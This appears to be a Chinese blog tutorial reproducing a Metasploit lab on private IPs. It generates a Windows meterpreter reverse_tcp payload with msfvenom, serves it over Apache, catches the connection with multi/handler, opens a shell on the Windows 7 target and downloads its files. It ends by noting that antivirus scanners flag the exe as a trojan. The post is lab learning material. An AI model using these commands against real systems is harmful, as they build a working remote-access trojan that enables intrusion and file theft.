Metasploit被控端与主控端复现

攻击机ip:192.168.48.129

靶机ip:192.168.48.133

需要先安装Windows7靶机

Windows7安装

全程使用root

一、先在kali中生成被控端

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.48.129 lport=5000 -f exe -o /root/payload.exe

二、将生成的payload.exe放进/var/WWW/html/

然后启动Apache服务

service apache2 start

三、靶机下载payload.exe

访问主机IP下的payload.exe文件

192.168.48.129/payload.exe

四、开始控制

1、攻击机开启msfconsole, 进入metasploit(msf)的控制台

2、配置参数

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.48.129
set lport 5000
exploit

然后就是等待靶机运行payload.exe

3、靶机运行payload.exe

在攻击机里看到下图

并输入shell可以看到进入了靶机的终端,此时可以控制靶机了

exit退出靶机终端

4、尝试下载靶机内的文件

ls查看目录

download + 文件名 下载文件

txt的内容为

五、放入网站检测payload.exe

http://www.virustotal.com

http://habo.qq.com

检测结果表示这是个木马

类型是Metasploit Connect

IP为192.168.48.129 port:5000

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值